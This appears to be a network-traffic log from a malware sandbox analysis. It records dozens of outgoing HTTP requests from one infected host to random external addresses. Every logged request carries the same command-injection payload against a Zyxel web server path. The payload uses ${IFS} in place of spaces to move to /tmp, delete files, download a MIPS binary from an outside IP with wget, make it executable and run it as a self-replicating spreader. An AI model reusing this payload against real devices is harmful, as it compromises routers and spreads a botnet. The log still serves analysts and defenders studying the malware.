                                      Jan 19, 2024 17:29:48.088527918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8126192.168.2.143753281.156.183.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088587999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8127192.168.2.143347492.22.191.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088615894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8128192.168.2.145565018.90.95.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088654041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8129192.168.2.145744420.255.232.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088701010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8130192.168.2.143630847.95.133.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088725090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8131192.168.2.143597659.35.191.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088777065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8132192.168.2.1444108122.5.129.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088820934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8133192.168.2.143604885.148.27.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088869095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8134192.168.2.1448492120.208.78.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088905096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8135192.168.2.1440222211.241.233.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088939905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8136192.168.2.1441930146.243.137.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.088968039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8137192.168.2.144414045.59.152.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089010000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8138192.168.2.1444774197.139.52.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089066982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8139192.168.2.1435450141.39.130.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089109898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8140192.168.2.144907032.80.202.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089133024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8141192.168.2.144855257.200.4.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089199066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8142192.168.2.1452780125.223.45.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089222908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8143192.168.2.143562843.44.58.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089265108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8144192.168.2.143712472.254.46.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089330912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8145192.168.2.1435958128.117.99.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089370012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8146192.168.2.145589666.243.76.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089386940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8147192.168.2.143872860.192.199.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089452982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8148192.168.2.145061844.216.242.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089498997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8149192.168.2.145778812.136.5.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089519978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8150192.168.2.144617878.210.8.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089613914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8151192.168.2.1439236171.167.121.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089649916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8152192.168.2.145050691.160.92.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089678049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8153192.168.2.1449170114.5.118.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089732885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8154192.168.2.1459176129.251.119.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089768887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8155192.168.2.1435764176.106.85.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089855909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8156192.168.2.1450690177.167.187.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089884996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8157192.168.2.144024293.86.101.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089905977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8158192.168.2.1458434156.248.164.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089912891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8159192.168.2.1439696199.90.178.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.089973927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8160192.168.2.146052043.57.57.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090030909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8161192.168.2.144880023.39.212.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090050936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8162192.168.2.144065467.71.148.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090087891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8163192.168.2.145018847.15.93.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090114117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8164192.168.2.1458644124.134.212.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090152025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8165192.168.2.145079261.64.78.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090181112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8166192.168.2.1439546164.191.148.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090213060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8167192.168.2.145103013.8.135.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090270042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8168192.168.2.145882423.161.32.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090300083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8169192.168.2.1450164185.175.158.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090365887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8170192.168.2.1434004150.107.174.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090394974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8171192.168.2.1449960167.58.213.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090430975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8172192.168.2.1443530222.126.58.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090493917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8173192.168.2.1435984181.83.89.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090526104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8174192.168.2.14341968.217.82.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090557098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8175192.168.2.14393708.51.92.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090595007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8176192.168.2.143357636.98.242.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090629101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8177192.168.2.1457732118.128.143.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090676069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8178192.168.2.144576095.126.78.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090729952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8179192.168.2.1446312192.127.140.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090771914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8180192.168.2.14473184.180.169.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090806007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8181192.168.2.1435652118.100.56.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090852022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8182192.168.2.1439812174.119.251.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090907097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8183192.168.2.145461412.106.181.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090935946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8184192.168.2.1443878209.212.66.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.090981960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8185192.168.2.146063882.93.70.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091026068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8186192.168.2.1440282110.66.120.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091061115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8187192.168.2.1444082112.232.13.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091125011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8188192.168.2.1433314198.115.161.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.091145992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8189192.168.2.145842471.82.162.30443
                                      TimestampBytes transferredDirectionData
